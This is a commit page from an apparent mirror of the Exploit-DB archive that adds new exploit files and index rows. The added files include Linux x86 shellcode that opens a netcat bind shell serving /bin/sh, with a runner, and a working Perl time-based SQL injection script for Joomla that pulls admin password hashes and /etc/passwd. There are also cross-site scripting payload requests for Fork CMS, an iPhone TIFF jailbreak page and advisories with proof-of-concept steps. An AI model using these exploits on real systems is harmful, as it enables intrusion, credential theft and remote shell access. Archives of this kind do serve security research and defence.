bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-05-07

Browse source 
9 new exploits
This commit is contained in:
Offensive Security 2015-05-07 05:03:16 +00:00
parent dc83e39d07
commit b2d25f8fa5
12 changed files with 815 additions and 79 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

11
files.csv
View file

@ -4164,6 +4164,7 @@ id,file,description,date,author,platform,type,port
4519,platforms/php/webapps/4519.txt,"Pindorama 0.1 client.php Remote File Inclusion Vulnerability",2007-10-11,S.W.A.T.,php,webapps,0
4520,platforms/php/webapps/4520.txt,"PicoFlat CMS <= 0.4.14 index.php Remote File Inclusion Vulnerability",2007-10-11,0in,php,webapps,0
4521,platforms/php/webapps/4521.txt,"Joomla Flash uploader 2.5.1 - Remote File Inclusion Vulnerabilities",2007-10-11,mdx,php,webapps,0
4522,platforms/hardware/remote/4522.html,"Apple iTouch/iPhone 1.1.1 - '.tif' File Remote Jailbreak Exploit",2007-10-11,"Niacin and Dre",hardware,remote,0
4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 Newsletter Module Remote SQL Injection Exploit",2007-10-11,s4mi,php,webapps,0
4524,platforms/php/webapps/4524.txt,"joomla component com_colorlab 1.0 - Remote File Inclusion Vulnerability",2007-10-12,"Mehmet Ince",php,webapps,0
4525,platforms/php/webapps/4525.pl,"TikiWiki <= 1.9.8 tiki-graph_formula.php Command Execution Exploit",2007-10-12,str0ke,php,webapps,0
@ -33207,7 +33208,7 @@ id,file,description,date,author,platform,type,port
36800,platforms/php/webapps/36800.txt,"Wordpress NEX-Forms < 3.0 - SQL Injection Vulnerability",2015-04-21,"Claudio Viviani",php,webapps,0
36801,platforms/php/webapps/36801.txt,"WordPress MiwoFTP Plugin <= 1.0.5 - Arbitrary File Download",2015-04-21,"dadou dz",php,webapps,0
36802,platforms/php/webapps/36802.txt,"WordPress Tune Library Plugin 1.5.4 - SQL Injection Vulnerability",2015-04-21,"Hannes Trunde",php,webapps,0
36803,platforms/windows/remote/36803.py,"ProFTPd 1.3.5 (mod_copy) - Remote Command Execution",2015-04-21,R-73eN,windows,remote,0
36803,platforms/linux/remote/36803.py,"ProFTPd 1.3.5 (mod_copy) - Remote Command Execution",2015-04-21,R-73eN,linux,remote,0
36804,platforms/php/webapps/36804.pl,"MediaSuite CMS - Artibary File Disclosure Exploit",2015-04-21,"KnocKout inj3ct0r",php,webapps,0
36805,platforms/php/webapps/36805.txt,"WordPress Community Events Plugin 1.3.5 - SQL Injection Vulnerability",2015-04-21,"Hannes Trunde",php,webapps,0
36808,platforms/windows/remote/36808.rb,"Adobe Flash Player copyPixelsToByteArray Integer Overflow",2015-04-21,metasploit,windows,remote,0
@ -33293,12 +33294,20 @@ id,file,description,date,author,platform,type,port
36898,platforms/php/webapps/36898.txt,"Etano 1.20/1.22 search.php Multiple Parameter XSS",2012-03-05,"Aung Khant",php,webapps,0
36899,platforms/php/webapps/36899.txt,"Etano 1.20/1.22 photo_search.php Multiple Parameter XSS",2012-03-05,"Aung Khant",php,webapps,0
36900,platforms/php/webapps/36900.txt,"Etano 1.20/1.22 photo_view.php return Parameter XSS",2012-03-05,"Aung Khant",php,webapps,0
36914,platforms/php/webapps/36914.txt,"Fork CMS 3.2.x Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-03-06,"Gjoko Krstic",php,webapps,0
36915,platforms/windows/remote/36915.txt,"NetDecision 4.6.1 Multiple Directory Traversal Vulnerabilities",2012-03-07,"Luigi Auriemma",windows,remote,0
36916,platforms/php/webapps/36916.txt,"Exponent CMS 2.0 'src' Parameter SQL Injection Vulnerability",2012-03-07,"Rob Miller",php,webapps,0
36917,platforms/php/webapps/36917.txt,"OSClass 2.3.x Directory Traversal and Arbitrary File Upload Vulnerabilities",2012-03-07,"Filippo Cavallarin",php,webapps,0
36909,platforms/windows/local/36909.rb,"RM Downloader 2.7.5.400 - Local Buffer Overflow (MSF)",2015-05-04,"TUNISIAN CYBER",windows,local,0
36910,platforms/php/webapps/36910.txt,"Open Realty 2.5.x 'select_users_template' Parameter Local File Include Vulnerability",2012-03-05,"Aung Khant",php,webapps,0
36911,platforms/php/webapps/36911.txt,"11in1 CMS 1.2.1 admin/comments topicID Parameter SQL Injection",2012-03-05,"Chokri B.A",php,webapps,0
36912,platforms/php/webapps/36912.txt,"11in1 CMS 1.2.1 admin/tps id Parameter SQL Injection",2012-03-05,"Chokri B.A",php,webapps,0
36913,platforms/php/webapps/36913.pl,"Joomla! 'redirect.php' SQL Injection Vulnerability",2012-03-05,"Colin Wong",php,webapps,0
36903,platforms/ios/dos/36903.txt,"Grindr 2.1.1 iOS - Denial of Service",2015-05-04,Vulnerability-Lab,ios,dos,0
36904,platforms/ios/webapps/36904.txt,"PhotoWebsite 3.1 iOS - File Include Web Vulnerability",2015-05-04,Vulnerability-Lab,ios,webapps,0
36920,platforms/windows/local/36920.py,"Mediacoder 0.8.34.5716 - Buffer Overflow SEH Exploit (.m3u)",2015-05-06,evil_comrade,windows,local,0
36921,platforms/lin_x86/shellcode/36921.c,"Linux x86 - /bin/nc -le /bin/sh -vp 17771 Shellcode (58 Bytes)",2015-05-06,"Oleg Boytsev",lin_x86,shellcode,0
36922,platforms/ios/webapps/36922.txt,"vPhoto-Album 4.2 iOS - File Include Web Vulnerability",2015-05-06,Vulnerability-Lab,ios,webapps,0
36906,platforms/linux/dos/36906.txt,"Apache Xerces-C XML Parser < 3.1.2 - DoS POC",2015-05-04,beford,linux,dos,0
36907,platforms/php/webapps/36907.txt,"Wordpress Ultimate Product Catalogue 3.1.2 - Multiple Persistent XSS & CSRF & File Upload",2015-05-04,"Felipe Molina",php,webapps,0
36908,platforms/lin_x86/shellcode/36908.c,"linux/x86 - exit(0) (6 bytes)",2015-05-04,"Febriyanto Nugroho",lin_x86,shellcode,0

Can't render this file because it is too large.

62
platforms/hardware/remote/4522.html
View file

@ -1,31 +1,31 @@
<!--
The iPhone / iTouch tif exploit is now officially released!
source: http://www.toc2rta.com/
So its offical we have released the tiff exploit code.
You can navigate in safari to http://jailbreak.toc2rta.com
on your Itouch or Iphone 1.1.1. It will crash your Safari
but then you will be able to browse the file system with
full read/write access. This is only for people who understand
what they are doing. You will need IPHUC and some knowledge of
how to put/get files.
TUTORIAL FOR WINDOWS http://www.ipodtouchfans.com/forums/showthread.php?t=1570
Check back later for a full breakdown of how the
tiff works and what the future holds for Toc2rta and the
Itouch & Iphone.
Exploit by Niacin and Dre.
A special thanks to Pumpkin,dinopio,davidc,natetrue,Smileydude,neimod
,Nervegas,erica,roxfan,phire and the rest of the dev team for all
their work that helped make this happen. You can visit the dev team's
site here : http://iphone.fiveforty.net/wiki/index.php?title=Main_Page
-->
<html>
<img src="http://www.milw0rm.com/sploits/10112007-iphone.tif">
</html>
# milw0rm.com [2007-10-11]
<!--
The iPhone / iTouch tif exploit is now officially released!
source: http://www.toc2rta.com/
So its offical we have released the tiff exploit code.
You can navigate in safari to http://jailbreak.toc2rta.com
on your Itouch or Iphone 1.1.1. It will crash your Safari
but then you will be able to browse the file system with
full read/write access. This is only for people who understand
what they are doing. You will need IPHUC and some knowledge of
how to put/get files.
TUTORIAL FOR WINDOWS http://www.ipodtouchfans.com/forums/showthread.php?t=1570
Check back later for a full breakdown of how the
tiff works and what the future holds for Toc2rta and the
Itouch & Iphone.
Exploit by Niacin and Dre.
A special thanks to Pumpkin,dinopio,davidc,natetrue,Smileydude,neimod
,Nervegas,erica,roxfan,phire and the rest of the dev team for all
their work that helped make this happen. You can visit the dev team's
site here : http://iphone.fiveforty.net/wiki/index.php?title=Main_Page
-->
<html>
<img src="https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10112007-iphone.tif">
</html>
# milw0rm.com [2007-10-11]

162
platforms/ios/dos/36903.txt Executable file
View file

@ -0,0 +1,162 @@
Document Title:
===============
Grindr 2.1.1 iOS Bug Bounty #2 - Denial of Service Software Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1418
Release Date:
=============
2015-05-02
Vulnerability Laboratory ID (VL-ID):
====================================
1418
Common Vulnerability Scoring System:
====================================
3.3
Product & Service Introduction:
===============================
Grindr, which first launched in 2009, has exploded into the largest and most popular all-male location-based social network out there.
With more than 5 million guys in 192 countries around the world -- and approximately 10,000 more new users downloading the app
every day -- youll always find a new date, buddy, or friend on Grindr. Grindr is a simple app that uses your mobile devices
location-based services to show you the guys closest to you who are also on Grindr. How much of your info they see is
entirely your call.
(Copy of the Vendor Homepage: http://grindr.com/learn-more )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a local and remote denial of servie vulnerability in the official Grindr v2.1.1 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2015-01-22: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security)
2015-01-22: Vendor Notification (Grinder - Bug Bounty Program)
2015-02-02: Vendor Response/Feedback (Grinder - Bug Bounty Program)
2015-04-01: Vendor Fix/Patch (Grindr Developer Team - Reward: x & Manager: x)
2015-05-04: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Grindr LLC
Product: Grinder - iOS Mobile Web Application (API) 2.2.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A local and remote Denial of Service vulnerability has been discovered in the official Grindr v2.1.1 iOS mobile web-application.
The attacker injects a script code tag or multiple termination strings (%00%20%00%20%00) to the Display Name input field of the Edit Profile module.
After the inject the service stored the malicious values as DisplayName. After the inject a random user is processing to click in the profile the
contact information (facebook/twitter). After that the victim wants to copy the link and an internal service corruption occurs thats crashs the mobile app.
The issue is local and remote exploitable.
Vulnerable Module(s):
[+] Edit Profile
Vulnerable Parameter(s): (Input)
[+] Display Name
Affected Module(s):
[+] Contact > Social Network > Copy Link
Proof of Concept (PoC):
=======================
The denial of service web vulnerability can be exploited by remote attacker and local user accounts with low user interaction (click).
To demonstrate the vulnerability or to reproduce the issue follow the provided information and steps below to continue.
Manual steps to reproduce ...
1. Open the grindr mobile application
2. Inject a script code tag as Display Name or use the terminated String with empty values
3. Save and click in the profile the contact button (exp. facebook)
4. Click to the send button ahead and push the Copy Link function
5. The app service is getting terminated with an uncaught exception because of an internal parsing error
Note:To exploit the issue remotly the profile needs to be shared with another user and then the user only needs to push the same way the social contact button.
PoC Video:
Solution - Fix & Patch:
=======================
First step is to prevent the issue by a secure restriction of the input. Attach a own excpetion-handling to prevent next to the insert itself.
The social network accounts that are linked do not allow special chars in the username. The grindr ios app and the android app allows to register
an account and to insert own scripts <html5> or null strings that corrupts the process of copy the link by an error. After the restriction has been
set in the code of both (api) the issue can not anymore execute to shutdown anothers users account. Even if this issue execution is prevented that
was only a solution to prevent.
To fix the bug ...
Connect for example ios device with the running app to windows. Sync the process and reproduce the remote error and local error. Move to the iOS error
folder that has been synced. Get the error attach another debugger and so on ...
Security Risk:
==============
The secuirty risk of the local and remote denial of service vulnerability in the copy link function that corrupts is estimated as medium.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

263
platforms/ios/webapps/36922.txt Executable file
View file

@ -0,0 +1,263 @@
Document Title:
===============
vPhoto-Album v4.2 iOS - File Include Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1477
Release Date:
=============
2015-05-05
Vulnerability Laboratory ID (VL-ID):
====================================
1477
Common Vulnerability Scoring System:
====================================
6.2
Product & Service Introduction:
===============================
vPhoto Pro is your side of the most powerful local album management software that allows you to easily manage your massive photos,
while giving you an unprecedented user experience. No in-app purchase, no functional limitations.
(Copy of the Homepage: https://itunes.apple.com/us/app/veryphoto-album-password-wifi/id720810114 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered a local file include web vulnerability in the official vPhoto-Album v4.2 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2015-05-05: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Cheng Chen
Product: vPhoto-Album - iOS Web Application (Wifi) 4.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official vPhoto-Album v4.2 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system
specific path commands to compromise the mobile web-application.
The vulnerability is located in the `name` value of the wifi interface module. Local attackers are able to manipulate the
wifi web interface by usage of the vulnerable sync function. The sync does not encode or parse the context of the albumname.
Local attacker are able to manipulate the input of the folder path value to exploit the issue by web-application sync.
The execution of unauthorized local file or path request occurs in the index file dir listing module of the wifi web-application.
The request method to inject is a sync and the attack vector is located on the application-side of the affected service.
The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.1.
Exploitation of the file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation
of the local file include web vulnerability results in mobile application or connected device component compromise.
Vulnerable Method(s):
[+] [Sync]
Vulnerable Module(s):
[+] Albumname
Vulnerable Parameter(s):
[+] name
Affected Module(s):
[+] File Dir Index
Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by local attackers with restricted physical device access and no user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: http://localhost:8080/
<script type="text/javascript">
var albumArray = getAllAlbum();
var numberOfAlbums = getNumberOfAlbums();
for (var i=0; i<numberOfAlbums; i=i+4)
{
document.write("<tr>");
document.write("<td height=\"170\" width=\"150\">");
if (i+0 < numberOfAlbums)
{
document.write("<p align=\"center\"><img border=\"0\" src=\"getCoverImage?"+encodeURI(JSON.stringify(albumArray[i+0]))+"\" width=\"170\" height=\"150\" onclick=albumClick('"+(i+0)+"')>");
}
document.write("</td>");
document.write("<td height=\"170\" width=\"50\"></td>");
document.write("<td height=\"170\" width=\"150\">");
if (i+1 < numberOfAlbums)
{
document.write("<p align=\"center\"><img border=\"0\" src=\"getCoverImage?"+encodeURI(JSON.stringify(albumArray[i+1]))+"\" width=\"170\" height=\"150\" onclick=albumClick('"+(i+1)+"')>");
}
document.write("</td>");
document.write("<td height=\"170\" width=\"50\"></td>");
document.write("<td height=\"170\" width=\"150\">");
if (i+2 < numberOfAlbums)
{
document.write("<p align=\"center\"><img border=\"0\" src=\"getCoverImage?"+encodeURI(JSON.stringify(albumArray[i+2]))+"\" width=\"170\" height=\"150\" onclick=albumClick('"+(i+2)+"')>");
}
document.write("</td>");
document.write("<td height=\"170\" width=\"50\"></td>");
document.write("<td height=\"170\" width=\"150\">");
if (i+3 < numberOfAlbums)
{
document.write("<p align=\"center\"><img border=\"0\" src=\"getCoverImage?"+encodeURI(JSON.stringify(albumArray[i+3]))+"\" width=\"170\" height=\"150\" onclick=albumClick('"+(i+3)+"')>");
}
document.write("</td>");
document.write("</tr>");
document.write("<tr>");
document.write("<td height=\"20\" > <p align=\"center\">");
if (i+0 < numberOfAlbums)
{
document.write("<font face=\"Courier New\" size=\"2\">");
document.write(albumArray[i+0].name+"("+albumArray[i+0].numberOfImage+")");
document.write("</font>");
}
document.write("</td>");
document.write("<td height=\"20\" width=\"50\"></td>");
document.write("<td height=\"20\" > <p align=\"center\">");
if (i+1 < numberOfAlbums)
{
document.write("<font face=\"Courier New\" size=\"2\">");
document.write(albumArray[i+1].name+"("+albumArray[i+1].numberOfImage+")");
document.write("</font>");
}
document.write("</td>");
document.write("<td height=\"20\" width=\"50\"></td>");
document.write("<td height=\"20\" > <p align=\"center\">");
if (i+2 < numberOfAlbums)
{
document.write("<font face=\"Courier New\" size=\"2\">");
document.write(albumArray[i+2].name+"("+albumArray[i+2].numberOfImage+")");
document.write("</font>");
}
document.write("</td>");
document.write("<td height=\"20\" width=\"50\"></td>");
document.write("<td height=\"20\" > <p align=\"center\">");
if (i+3 < numberOfAlbums)
{
document.write("<font face=\"Courier New\" size=\"2\">");
document.write(albumArray[i+3].name+"("+albumArray[i+3].numberOfImage+")");
document.write("</font>");
}
document.write("</td>");
document.write("</tr>");
document.write("<tr>");
document.write("<td height=\"20\" colspan=\"7\">"); document.write("</td>");
document.write("</tr>");
}
</script>
<tr><td height="170" width="150"><p align="center"><img src="getCoverImage?%7B%22name%22:%22%5C%22%3E%3C[FILE INCLUDE VULNERABILITY!]%3E%22,%22type%22:%222%22,%22groupType%22:2,%22url%22:%22assets-library://group/?id=B94CC6C9-FB2C-4BFD-8BA4-0925E51146A1&filter=1537%22,%22numberOfImage%22:%222%22%7D" onclick="albumClick('0')" border="0" height="150" width="170"></p></td><td height="170" width="50"></td><td height="170" width="150"><p align="center"><img src="getCoverImage?%7B%22name%22:%22Camera%20Roll%22,%22type%22:%222%22,%22groupType%22:16,%22url%22:%22assets-library://group/?id=70169F06-36C7-430C-AA4F-55B95E268426%22,%22numberOfImage%22:%222%22%7D" onclick="albumClick('1')" border="0" height="150" width="170"></p></td><td height="170" width="50"></td><td height="170" width="150"></td><td height="170" width="50"></td><td height="170" width="150"></td></tr><tr><td height="20"> <p align="center"><font face="Courier New" size="2">"><C[FILE INCLUDE VULNERABILITY!]>(2)</font></td><td height="20" width="50"></td><td height="20" > <p align="center"><font face="Courier New" size="2">Camera Roll(2)</font></td><td height="20" width="50"></td><td height="20" > <p align="center"></td><td height="20" width="50"></td><td height="20" > <p align="center"></td></tr><tr><td height="20" colspan="7"></td></tr>
</table>
</div>
</body>
</html></iframe></font></p></td></tr></tbody>
Reference(s):
http://localhost:8080/
Security Risk:
==============
The security riskof the local file include web vulnerability in the album values is estimated as high. (CVSS 6.2)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Katharin S. L. (CH) (research@vulnerability-lab.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

51
platforms/lin_x86/shellcode/36921.c Executable file
View file

@ -0,0 +1,51 @@
/*
# Linux x86 /bin/nc -le /bin/sh -vp 17771 shellcode
# This shellcode will listen on port 17771 and give you /bin/sh
# Shellcode Author: Oleg Boytsev
# Tested on: Debian GNU/Linux 7/i686
# Shellcode Length: 58
# Command: gcc -m32 -z execstack x86_Linux_netcat_shellcode.c -o x86_Linux_netcat_shellcode
global _start
section .text
_start:
xor eax, eax
xor edx, edx
push eax
push 0x31373737 ;-vp17771
push 0x3170762d
mov esi, esp
push eax
push 0x68732f2f ;-le//bin//sh
push 0x6e69622f
push 0x2f656c2d
mov edi, esp
push eax
push 0x636e2f2f ;/bin//nc
push 0x6e69622f
mov ebx, esp
push edx
push esi
push edi
push ebx
mov ecx, esp
mov al,11
int 0x80
*/
#include<stdio.h>
#include<string.h>
unsigned char shellcode[] =
"\x31\xc0\x31\xd2\x50\x68\x37\x37\x37\x31\x68\x2d\x76\x70\x31\x89\xe6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x52\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80";
main()
{
printf("Shellcode Length: %d\n",strlen(shellcode));
int (*ret)() = (int(*)())shellcode;
ret();
}

125
platforms/php/webapps/36913.pl Executable file
View file

@ -0,0 +1,125 @@
source: http://www.securityfocus.com/bid/52312/info
Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
#!/usr/bin/perl
# Thu Mar 15 22:55:32 CET 2012 A. Ramos <aramosf()unsec.net>
# www.securitybydefault.com
# Joomla <2.5.1 time based sql injection - vuln by Colin Wong
#
# using sleep() and not benchmark(), change for < mysql 5.0.12
#
# 1.- Database name: database()
# 2.- Users data table name: (change 'joomla' for database() result)
# select table_name from information_schema.tables where table_schema = "joomla" and table_name like "%_users"
# 3.- Admin password: (change zzz_users from previus sql query result)
# select password from zzzz_users limit 1
use strict;
use LWP::UserAgent;
$| = 1;
my $url = $ARGV[0];
my $wtime = $ARGV[1];
my $sql = $ARGV[2];
unless ($ARGV[2]) {
print "$0 <url> <wait time> <sql>\n";
print "\texamples:\n";
print "\t get admin password:\n";
print "\t\t$0 http://host/joomla/ 3 'database()'\n";
print "\t\t$0 http://host/joomla/ 3 'select table_name from information_schema.tables where table_schema=\"joomla\" and table_name like \"%25_users\"\'\n";
print "\t\t$0 http://host/joomla/ 3 'select password from zzzz_users limit 1'\n";
print "\t get file /etc/passwd\n";
print "\t\t$0 http://host/joomla/ 3 'load_file(\"/etc/passwd\")'\n";
exit 1;
}
my ($len,$sqldata);
my $ua = LWP::UserAgent->new;
$ua->timeout(60);
$ua->env_proxy;
my $stime = time();
my $res = $ua->get($url);
my $etime = time();
my $regrtt = $etime - $stime;
print "rtt: $regrtt secs\n";
print "vuln?: ";
my $sleep = $regrtt + $wtime;
$stime = time();
$res = $ua->get($url."/index.php/404' union select sleep($sleep) union select '1");
$etime = time();
my $rtt = $etime - $stime;
if ($rtt >= $regrtt + $wtime) { print "ok!\n"; } else { print "nope :(\n"; exit 1; }
my $lenoflen;
sub len {
# length of length
for (1..5) {
my $sql=$_[0];
$stime = time();
$res = $ua->get($url."/index.php/404' union select if(length(length(($sql)))=$_,sleep($wtime),null) union select '1");
$etime = time();
my $rtt = $etime - $stime;
if ($rtt >= $regrtt + $wtime) {
$lenoflen = $_;
last;
}
}
for (1..$lenoflen) {
my $ll;
$ll=$_;
for (0..9) {
my $sql=$_[0];
$stime = time();
$res = $ua->get($url."/index.php/404' union select if(mid(length(($sql)),$ll,1)=$_,sleep($wtime),null) union select '1");
$etime = time();
my $rtt = $etime - $stime;
if ($rtt >= $regrtt + $wtime) {
$len .= $_;
}
}
}
return $len;
}
sub data {
my $sql = $_[0];
my $len = $_[1];
my ($bit, $str, @byte);
my $high = 128;
for (1..$len) {
my $c=8;
@byte="";
my $a=$_;
for ($bit=1;$bit<=$high;$bit*=2) {
$stime = time();
# select if((ord(mid((load_file("/etc/passwd")),1,1)) & 64)=0,sleep(2),null) union select '1';
$res = $ua->get($url."/index.php/404' union select if((ord(mid(($sql),$a,1)) & $bit)=0,sleep($wtime),null) union select '1");
$etime = time();
my $rtt = $etime - $stime;
if ($rtt >= $regrtt + $wtime) {
$byte[$c]="0";
} else { $byte[$c]="1"; }
$c--;
}
$str = join("",@byte);
print pack("B*","$str");
}
}
$len = len($sql);
print "$sql length: $len\n";
print "$sql data:\n\n";
data($sql,$len);

61
platforms/php/webapps/36914.txt Executable file
View file

@ -0,0 +1,61 @@
source: http://www.securityfocus.com/bid/52319/info
Fork CMS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
Fork CMS 3.2.7 and 3.2.6 are vulnerable; other versions may also be affected.
http://www.example.com/private/en/locale/edit?id=37&value="><script>alert("ZSL");</script>
http://www.example.com/private/en/locale/edit?id=37&name="><script>alert("ZSL");</script>
http://www.example.com/private/en/locale/edit?id=37&type[]="><script>alert("ZSL");</script>
http://www.example.com/private/en/locale/edit?id=37&module="><script>alert("ZSL");</script>
http://www.example.com/private/en/locale/edit?id=37&application="><script>alert("ZSL");</script>
http://www.example.com/private/en/locale/edit?id=37&language[]="><script>alert("ZSL");</script>
Parameter: form_token
Method: POST
- POST /private/en/authentication/?querystring=/private/en HTTP/1.1
Content-Length: 134
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=t275j7es7rj2078a25o4m27lt0; interface_language=s%3A2%3A%22en%22%3B; track=s%3A32%3A%22b8cab7d50fd32c5dd3506d0c88edb795%22%3B
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
backend_email=&backend_password=&form=authenticationIndex&form_token="><script>alert("ZSL");</script>&login=Log%20in
Parameters: position_1, position_2, position_3, position_4
Method: POST
- POST http://localhost/private/en/extensions/edit_theme_template?token=true&id=4 HTTP/1.1
form=edit&form_token=d75161cf347e7b12f53df4cf4082f27a&theme=triton&file=home.tpl&label=Home&position_0=&type_0_0=0&position_1="><script>alert("ZSL");</script>&position_2=left&position_3=right&position_4=top&type_4_0=1&position_5=advertisement&format=%5B%2F%2Cadvertisement%2Cadvertisement%2Cadvertisement%5D%2C%0D%0A%5B%2F%2C%2F%2Ctop%2Ctop%5D%2C%0D%0A%5B%2F%2C%2F%2C%2F%2C%2F%5D%2C%0D%0A%5Bmain%2Cmain%2Cmain%2Cmain%5D%2C%0D%0A%5Bleft%2Cleft%2Cright%2Cright%5D
Parameter: success_message
Method: POST
- POST http://localhost/private/en/form_builder/edit?token=true&id=1 HTTP/1.1
form=edit&form_token=&id=1&name=Contact&method=database_email&inputField-email%5B%5D=jox@jox.com&addValue-email=&email=jox@jox.com&success_message="><script>alert("ZSL");</script>&identifier=contact-en
Parameter: smtp_password
Method: POST
- POST http://localhost/private/en/settings/email HTTP/1.1
form=settingsEmail&form_token=&mailer_type=mail&mailer_from_name=Fork+CMS&mailer_from_email=jox@jox.com&mailer_to_name=Fork+CMS&mailer_to_email=jox@jox.com&mailer_reply_to_name=Fork+CMS&mailer_reply_to_email=jox@jox.com&smtp_server=&smtp_port=&smtp_username=&smtp_password="><script>alert("ZSL");</script>
Parameters: site_html_footer, site_html_header
Method: POST
- POST http://localhost/private/en/settings/index HTTP/1.1
